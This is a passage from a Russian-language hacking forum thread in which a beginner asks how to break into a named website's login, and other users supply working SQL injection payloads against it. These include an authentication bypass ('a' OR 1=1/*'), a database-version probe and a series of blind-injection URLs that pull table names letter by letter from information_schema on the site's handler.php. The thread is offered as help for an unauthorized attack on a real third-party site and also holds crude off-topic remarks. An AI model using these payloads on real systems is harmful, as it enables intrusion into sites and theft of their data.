|
Помогите "зеленому" с инъекцией!
есть сайт
http://wblist.ru/t3/ короче как произвести sql инъякцию на нем? ==================================== я накопал username передается при помощи GET http://wblist.ru/t3/handler.php?username=(значения вводимое в поле с паролем) а пароль как ни странно вводиться который приходит в ответном смс! короче не знаю что дальше делать! BlackCats написал что он ломал этот сайт, но он уехал и не хочет мне ничего рассказывать! Так что пипл помогите не знаю что дальше делать! |
класнные сиськи
|
В запросе к серваку он зачем-то передает мой cookies со значением phpsessid для чего интеррсно!
Что-то я запутался! Выручайте молодняк! |
http://wblist.ru/t3/ajax.js
очень интересная функция function handleResponse() ,как подминить результат? вообще возможно? если не хотите помогать хотя бы скажите правильно ли я думаю? |
Цитата:
|
ну я зелённый,перечитал форум решил попробывать свои силы!
|
Цитата:
|
А мне кажется что сайт разводка...:) Ни каких секретов нет, а на счёт взлома фермера на ачате много инфы... :)
|
Вместо пароля с SMS введи
a' OR 1=1/* получишь нужную херню |
Слушай BlackSun,а можешь рассшифровать?
|
Цитата:
Цитата:
|
%63%61%20%65%30%20%65%61%20%32%30%20%65%32%20%66%6 2%20%32%63%20%32%30%20%65%31%20%65%62%20%66%66%20% 66%32%20%66%63%20%32%63%20%32%30%20%65%37%20%65%30 %20%65%35%20%65%31%20%65%30%20%65%62%20%65%38%20%3 2%63%20%32%30%20%66%35%20%65%65%20%66%32%20%66%63% 20%32%30%20%65%31%20%66%62%20%32%30%20%65%61%20%66 %32%20%65%65%20%32%30%20%65%31%20%65%30%20%66%38%2 0%65%61%20%65%65%20%65%39%20%32%30%20%65%66%20%65% 65%20%65%34%20%66%33%20%65%63%20%65%30%20%65%62
|
Цитата:
ты расшифровать можешь каким,что значит a' OR 1=1/* это Javascript? только по русски |
/me в ужосе схватился за голову
нет слов... |
А почему именно 1=1 а не например другой символ=1?
я проверил если 1=0 то пароль не верный! а что это за язык тут используется? |
язык SQL
вбей в поле пароль 'OR 1/* и забанься на форуме, тебеж всё уже сказали |
по твоему 1=0 верное сравнение?)
|
2TC
https://forum.antichat.ru/threadnav43966-1-10.html и вообще что-то гон тут уже пошол |
5 версия
http://wblist.ru/t3/handler.php?username=a'+OR+substring(version(),1,1 )=5/* давайте хекнем? :) |
Спачибо пипл!
Админы тему можно закрыть! |
Код:
http://wblist.ru/t3/handler.php?username=a'+OR+((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2015,1)='VIEWS')/*Да, я неумею юзать проги для слепых скулей :( Код:
http://wblist.ru/t3/handler.php?username=a'+OR+(SELECT+LENGTH(table_name)+FROM+information_schema.tables+LIMIT+16,1)=5/*Код:
http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2016,1),1,1))=102/*Код:
http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2016,1),2,1))=105/*Код:
http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2016,1),3,1))=111/*Код:
http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2016,1),4,1))=105/*Код:
http://wblist.ru/t3/handler.php?username=a'+OR+ASCII(SUBSTRING((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2016,1),5,1))=113/*не, точно fioiq Код:
http://wblist.ru/t3/handler.php?username=a'+OR+((SELECT%20table_name%20FROM%20information_schema.tables%20LIMIT%2016,1)='fioiq')/*== ТС, ты ещё тут? Как мозг? :D |
тут были сиськи
|
и пиписки
|
Я плакать... Форма отправки коммента :) xD
Код:
<input class=“input-text” type=“text” value="Имя"/> |
о_О и отправляет?
|
Я сначала подумал, что Green Member'у нужна помощь в проведении скули :-DD
|
Цитата:
|
http://forum.antichat.ru/showpost.php?p=1424335&postcount=10326
И никаких блиндов не надо... |
|
вышло обновление
|
| Время: 12:16 |